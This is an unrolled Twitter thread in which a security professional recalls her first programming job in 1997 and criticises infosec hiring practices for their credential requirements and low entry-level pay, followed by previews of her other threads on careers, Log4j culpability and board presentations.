April 17, 1997 - $35,000/yr

No joke I still remember the exact details. That was the day I started my first salaried job as a programmer. I had no degree (I was enrolled in a Computer Science program at Marquette University), no real documented dev experience.

/1
All of what I knew of programming was self-taught and a little theory from my course work that I had only just begun that semester. BASIC, Visual C++, and a little bit of VB.

I got hired to write code for a home banking and billpay application. It was the dot com era.

/2
Programmers were in high demand. The company that hired me provided banking software as a service (we called it a service bureau back then) to banks across the country. Consumers nationwide relied on the systems I maintained to manage their accounts and to pay their bills.

/3
We processed billions of dollars in payments each year. System failures could result in massive financial chaos.

I was never asked to complete a practical programming exercise to get hired. No certifications were demanded of me. As an entry level programmer, I wasn't

/4
expected to have detailed understanding of SDLCs, organizational politics, etc. No, instead they saw I had some knowledge, a desire to learn and grow, and they had the confidence in their own ability to develop my skills for both the org's benefit and my own.

/5
We sit right now, in the #cybersecurity industry, in the same position we were back then with developers. A seemingly insurmountable need for skilled humans, implications that range from localized to highly critical. But look how few orgs are willing to take the same hiring

/6
approach. We say we want candidates with passion, yet it's only a cursory consideration in our hiring decisions. We force arbitrary requirements for certs, degrees, etc. Entry level positions are few and far between and those touted as entry level often have requirements that

/7
are anything but entry level. We aren't willing to grow grassroots talent and instead insist that cyber security is so critical that everyone we hire must be highly experienced. Ignoring the fact that without incubating talent, this is unsustainable.

/8
And we pay people horribly. Seeing "entry level" security analyst roles offering only $5-15K more than I got in my first programming role 25 years ago!!

This is why we have a talent disconnect. There's no shortage, it's cavernous divide. And as much as we bemoan

/9
and blame recruiters/HR, we as hiring managers are EVERY BIT as culpable. We don't train in how to effectively recruit and hire. We ignore the fact that interviewing is a skill in and of itself and assume our job knowledge qualifies us as expert interviewers.

/10
It's time for all of us in #infosec, to stop blaming and take responsibility. To look at hiring differently. To take risks on people. To focus on growing grassroots talent. And ultimately to #DoBetterBeBetter.

I am so thankful every day for all the leaders in my past

/11
who took a chance on me and put me in the position I am today. I'm dedicating my book to one of them.

Be the kind of leader that someone remembers for life. Rob G., Tim P., Donna B., Aaron S., and Patrick F. I'll never forget them and what they've done for me.

/FIN

โ€ข โ€ข โ€ข

Missing some Tweet in this thread? You can try to force a refresh
ใ€€

Keep Current with Alyssa Miller ๐Ÿ‘‘ Duchess of Hackington

Alyssa Miller ๐Ÿ‘‘ Duchess of Hackington Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @AlyssaM_InfoSec

Dec 25, 2021
I'm angry this morning. Truly angry with myself.

I don't come from money. Growing up, we weren't poor, but near the bottom of the 80's middle class. I always dreamed of being in a better financial position than my parents, but swore I wouldn't forget where I came from.

1/
My first child (of 3) came when I was 17. Married at 21, I lived through nearly two decades of overdrawn bank accounts, maxed out credit cards, collection calls and threats of lawsuits.

Ultimately, we were fortunate. Never had a night where I couldn't scrounge

2/
something together for dinner. I have my family to thank for much of that.

So why I am I giving you this walk through Alyssa's past? Well because now in my 40's I'm in a position that I dreamed of as a child. Financially, while not rich by today's standards, I am in

3/
Read 8 tweets
Dec 24, 2021
Christmas more than NYE for me is the time I look back.

I remember so clearly the day I took the red pill. While I knew it'd change my life, many of the changes came in ways I'd have never imagined. So many good things happened this year for me as a result of that day.

1/
I have learned to be authentic in ways I never was before.

That authenticity has allowed me to connect with people in ways I never did before.

Those connections have enabled me to climb mountains in my career and personal life faster than ever before.

2/
Summiting those mountains has given me confidence like never before.

Each climb has brought new amazing people into my life who I love and rely on for support in ways I never could before.

Sure, lots of crappy things happened to me since taking the red pill too.

3/
Read 4 tweets
Dec 13, 2021
I certainly believe while we have moved past the tip of the iceberg, we're nowhere done with #log4j and it's issues. EVERYONE is now looking at this package and finding new variants and even new vulns. Don't expect to sleep anytime soon my dear #infosec fam.

1/
That said, remember there are likely malicious actors out there looking for the next thing already. With log4j burnt and orgs rapidly applying mitigations and fixes, what next? Where do we find the next widely used package with significant vulnerabilities like this?

2/
With that in mind, please drop the adversarial bullshit. I've seen devs abdicating all responsibility for the maintainers. I've seen security folks hating on devs. The mistakes made that led to this vuln. are laughably easy (to us as #infosec professionals).

3/
Read 8 tweets
Dec 12, 2021
Hey #infosec peeps, many of us are tired, frustrated, and exasperated by #Log4Shell.

That said, how about we not blast developers en-masse or even within OSS or even within the Log4j project. Let's remember we have culpability here as well.

1/
We did nothing with a warning that was given to us in 2016 at BlackHat. Not one detection rule or scanner policy was created.

Despite extensive OSS security research done by orgs and academia, we failed to find this vuln in probably the single most popular Java package.

2/
How many of us are scrambling now because basic security controls (WAF's, Outbound connectivity lockdowns, etc.) that could have limited/prevented exploit of this vulnerability don't exist in our environments?

3/
Read 6 tweets
Dec 2, 2021
Thursday morning, back home after a few days of board meetings and I have some thoughts to share on being effective in board presentations. Tech and security leaders still seem to struggle in these settings so here goes:

As always, it's a ๐Ÿงต

1/
1. Research your board members. Find out in advance who you'll be presenting to and look up their background. Talk to your peers who've chatted with the board before, see what intel you can get from them on the dynamics of those discussions. Prep accordingly.

2/
2. Read the room. Important with any presentation but particularly so in the board room. If they're looking at their phones, you lost them. It maybe that you got to technical. Change things up, change your tone, elevate the message and grab their attention again.

3/
Read 8 tweets
Dec 1, 2021
The number of potentially qualified people that I see self-eliminating from open #infosecjobs saddens me. The thing is when you're looking at job descriptions, there are two ways you can look at them.

In typical Alyssa fashion, a ๐Ÿงต follows:

1/
Some people will read through the requirements from an implicit mindset of identifying the reasons not to apply. They look for any requirements that suggest they're not qualified and when they find too many of them (for some that means even one), they choose not to apply.

2/
The other method, and the mindset I wish more job seekers would take, is to look at a job description with the focus of finding the reasons to apply. What requirements are things you're good at or could be good at. What responsibilities are areas of interest for you.

3/
Read 6 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us on Twitter!

:(